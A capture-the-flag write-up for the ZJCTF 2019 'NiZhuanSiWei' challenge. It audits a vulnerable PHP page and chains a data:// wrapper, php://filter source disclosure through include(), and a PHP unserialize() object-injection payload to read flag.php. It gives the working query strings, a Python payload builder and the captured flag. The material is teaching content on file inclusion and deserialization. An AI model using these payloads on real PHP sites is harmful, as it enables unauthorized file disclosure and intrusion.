Open the challenge link.
You are dropped straight onto a piece of PHP that needs to be audited:
```php
<?php
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
// Gate 1: the *contents read from* $text must equal the fixed string
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    // Gate 2: the raw $file string may not contain "flag"
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit();
    }else{
        include($file); //useless.php
        // Sink: attacker-controlled unserialize(), then echo -> __toString()
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>
```
What this challenge tests: PHP stream wrappers (伪协议), plus a small deserialization chain.
![Figure 1: [ZJCTF 2019]NiZhuanSiWei – buu practice notes – 安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/04/image-75-1024x376.png)
First bypass: the data:// wrapper supplies the file contents
```php
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))
```
We have to pass a `text` parameter such that whatever `file_get_contents` reads from it is exactly `welcome to the zjctf`. We control no file on the server with that content, so we use the `data://` wrapper: `file_get_contents` then returns the bytes embedded in the URL itself. No PHP code is executed at this step, the wrapper only supplies data; it does require `allow_url_fopen=On`, which is PHP's default.
Payload:

```
text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
```
The base64 form is the usual choice. It is encoding, not encryption: it keeps spaces and other special characters out of the query string (the plain form `data://text/plain,welcome to the zjctf` also works if the spaces are URL-encoded) and it gets past naive keyword filters on the parameter.
Second bypass: php://filter to read source code
```php
$file = $_GET["file"];
if(preg_match("/flag/",$file)){
    echo "Not now!";
    exit();
}else{
    include($file); //useless.php
    $password = unserialize($password);
    echo $password;
}
```
`$file` goes straight into `include()`, but including `useless.php` directly would just execute it and show nothing. Wrapping it in the `php://filter` wrapper with the `convert.base64-encode` filter turns the source into inert text, so `include()` echoes the base64 of the file instead of running it. The `/flag/` check stops us from reading `flag.php` this way, so we follow the `//useless.php` hint in the comment. (`php://filter` is usable inside `include()` even when `allow_url_include` is off.)
Payload:

```
file=php://filter/read=convert.base64-encode/resource=useless.php
```
Base64-decoding the response gives:
```php
<?php
class Flag{  //flag.php
    public $file;
    // PHP method names are case-insensitive, so __tostring is the __toString magic method
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
            return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}
?>
```
Third bypass: deserialization
Generate the serialized object locally using the same class definition, with `$file` preset to `flag.php`. When the server does `echo $password` on the unserialized object, `__toString` fires and `file_get_contents` reads that file:
```php
<?php
class Flag{  //flag.php
    public $file="flag.php";
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
            return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}
$a = new Flag();
echo serialize($a);
?>
```
![Figure 2: [ZJCTF 2019]NiZhuanSiWei – buu practice notes – 安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/04/image-76-1024x240.png)
Result:

```
O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
```
Build the final payload:

```
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
```
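To tie the three gates together, here is a payload builder in Python. It is an added example written for these notes, not code from the original writeup or from the challenge: it produces the `data://` value for `text`, the `php://filter` value for `file`, and a PHP-compatible `serialize()` of the `Flag` object with correct byte lengths, and it checks every `file` value against the same `/flag/` regex the server applies. `TARGET` is an assumed placeholder, not the BUU instance URL; the script only prints the URLs and sends nothing.

```python
"""Payload builder for the three gates of NiZhuanSiWei (added example, not the
original writeup's code). Nothing is sent over the network."""
import base64
import re
import urllib.parse

TARGET = "http://example.invalid/index.php"  # assumption: stand-in for the challenge URL
MAGIC = "welcome to the zjctf"


def data_uri(content: str, use_base64: bool = True) -> str:
    """Value for text=. file_get_contents() on a data:// URI returns the embedded
    bytes, so the === comparison sees exactly `content`; no PHP runs here."""
    if use_base64:
        return "data://text/plain;base64," + base64.b64encode(content.encode()).decode()
    return "data://text/plain," + content  # spaces are URL-encoded by build_query()


def filter_read(resource: str) -> str:
    """Value for file=. convert.base64-encode turns the included PHP into inert
    text, so include() prints it instead of executing it."""
    return "php://filter/read=convert.base64-encode/resource=" + resource


def simulate_filter_include(source: str) -> str:
    """What the server echoes for filter_read(): the base64 of the raw file."""
    return base64.b64encode(source.encode()).decode()


def decode_filter_output(body: str) -> str:
    return base64.b64decode(body).decode()


def passes_file_gate(file_param: str) -> bool:
    """Mirror of preg_match("/flag/", $file). Only $file is inspected; the
    serialized password is never checked, so it may name flag.php freely."""
    return re.search(r"flag", file_param) is None


def php_serialize_object(cls: str, props: dict) -> str:
    """serialize() for a flat object with string/int properties. PHP's s:N: is a
    BYTE length, so multibyte values must be measured after UTF-8 encoding."""
    def ser(v):
        if isinstance(v, int):
            return "i:%d;" % v
        return 's:%d:"%s";' % (len(v.encode("utf-8")), v)
    body = "".join(ser(k) + ser(v) for k, v in props.items())
    return 'O:%d:"%s":%d:{%s}' % (len(cls.encode("utf-8")), cls, len(props), body)


def build_query(params: dict) -> str:
    # urlencode percent-encodes '+', '=', '/' etc.; a bare '+' from base64 pasted
    # into a browser would otherwise decode to a space and break the data:// value
    return urllib.parse.urlencode(params)


def parse_query(qs: str) -> dict:
    return {k: v[0] for k, v in urllib.parse.parse_qs(qs, keep_blank_values=True).items()}


def stage1_params() -> dict:
    """Source disclosure: pass gate 1, read useless.php through php://filter."""
    file_param = filter_read("useless.php")
    assert passes_file_gate(file_param)
    return {"text": data_uri(MAGIC), "file": file_param, "password": ""}


def stage2_params() -> dict:
    """Final: include useless.php so class Flag exists, then unserialize a Flag
    whose $file is flag.php; echo $password calls __toString -> file_get_contents."""
    payload = php_serialize_object("Flag", {"file": "flag.php"})
    assert passes_file_gate("useless.php")
    return {"text": data_uri(MAGIC), "file": "useless.php", "password": payload}


if __name__ == "__main__":
    for stage in (stage1_params, stage2_params):
        print(TARGET + "?" + build_query(stage()))
```

Run it and paste the printed URLs into the browser, or feed `stage1_params()` / `stage2_params()` to an HTTP client. The builder percent-encodes the parameters for you; when typing a payload by hand, remember that a `+` inside base64 must be written as `%2B`, and that `s:N:` in the serialized object counts bytes, which is why the builder measures the UTF-8 encoding rather than `len()` of the Python string.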
![Figure 3: [ZJCTF 2019]NiZhuanSiWei – buu practice notes – 安全小天地](https://img.godyu.com/2023/12/20231226130240538.png?imageView2/0/format/webp/q/75)
The flag is in the page source: `file_get_contents("flag.php")` is echoed verbatim, so the flag arrives inside a `<?php ... ?>` block that the browser treats as an unknown tag and does not render. View the page source to read it.
![Figure 4: [ZJCTF 2019]NiZhuanSiWei – buu practice notes – 安全小天地](https://img.godyu.com/2023/12/20231226210241513.png?imageView2/0/format/webp/q/75)
So the final flag is:

```
flag{48f43da1-7c83-4f28-bf71-ddfb42ff3b1e}
```